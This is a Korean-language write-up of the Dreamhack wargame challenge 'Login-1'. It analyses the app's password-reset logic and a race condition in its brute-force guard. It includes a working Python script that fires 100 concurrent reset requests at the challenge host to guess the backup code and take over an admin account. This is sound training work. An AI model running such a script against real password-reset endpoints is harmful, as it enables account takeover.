[Dreamhack] Login-1 드림핵 워게임 문제 풀이

7 - 0 - 1. Login-1 스크립트 공격 실습

 

 

# Login-1 스크립트 공격 실습

1. 문제 정보 확인 후 문제 파일 다운로드

 

 

 

 

2. app.py 파일을 열고 코드 분석

+ << Line 13 ~ 17 >> 

: admin 계정의 권한은 1, guest 계정의 권한이 0으로 설정되며, 5회 이상 비밀번호에 잘못된 값을 입력한다면 더 이상 시도할 수 없음 

 

+ << Line 24 ~ 25 >>  

: 사용자가 새로운 계정을 생성할 때 각 계정마다 부여되는 BackupCode는 1과 100 사이의 정수임 

 

 

 

+ << Line 70 ~ 77 >>  

: 사용자로부터 userid, password, name을 입력받아 새로운 계정을 생성

 

+ << Line 82 ~ 83 >>  

: 만일 사용자가 입력한 userid가 기존에 존재하던 id와 동일하다면 'Already Exists userid.' 경고문을 출력

 

 

 

+ << Line 91 ~ 98 >>

: 사용자로부터 id, 변경할 비밀번호, 회원가입 시에 부여된 backupCode 를 입력받는 코드

 

+ << Line 103 ~ 105 >> 

: 전수 공격을 예방하기 위한 코드로, 1초가 지나기 전 다수의 접근이 발생했을 경우 레이스 컨디션 취약점을 발생시킴

-->  레이스 컨디션이란? 

: 2개 이상의 프로세스가 한 자원을 한꺼번에 읽어들이거나 사용할 때, 그 데이터에 대한 접근이 이루어진 순서가 프로세스 실행 결과에 영향을 미치는 상황 

 

+ << Line 106 ~ 122 >>

: 사용자가 입력한 id, BackupCode가 기존 계정의 정보와 일치하는 경우 비밀번호를 사용자로부터 입력한 값으로 변경해줌

 

 

 

 

3. 접속 링크 확인 후 안내된 링크로 접속

 

 

 

 

 

4. URL 상단에 /user/1 을 추가하여 admin 권한을 가진 계정 확인

캡쳐를 다시해서 문제 풀이 url과 상이함

+ Apple 계정을 이용하여 Flag 탐색을 시도할 계획

 

 

 

 

5. 로그인 페이지로 이동 후 userid, password에 각각 admin을 입력하여 로그인 시도 

 

잘못된 아이디와 패스워드라는 경고 메시지 출력

 

 

 

 

6. Python 스크립트 작성을 통해 Apple 계정의 비밀번호를 0000으로 변경

import threading, requests

url = "http://host3.dreamhack.games:17262/forgot_password"

def forgot(backupCode):
    data = {"userid": "Apple", "newpassword": "0000", "backupCode": backupCode}
    requests.post(url, data=data)
    print(f"Backupcode: {backupCode}")

if __name__ == "__main__":
    threads = []
    print("Attack Start")

    for i in range(1, 100 + 1):
        t = threading.Thread(target=forgot, args=[i])
        t.start()
        threads.append(t)

    for thread in threads:
        thread.join()

 

 

 

 

7. 공격 수행 후 다시 로그인 페이지로 들어와 Apple 계정으로 로그인 시도

 

userid에 Apple, password에 0000입력

 

로그인에 성공함을 확인

 

 

 

 

8. 로그인 후 admin 탭 클릭  -->  Flag가 출력됨을 확인

 

 

 

 

+ 풀이 및 코드 참고

https://weakness.kr/dreamhack/Dreamhack-login-1/

https://krampus.tistory.com/100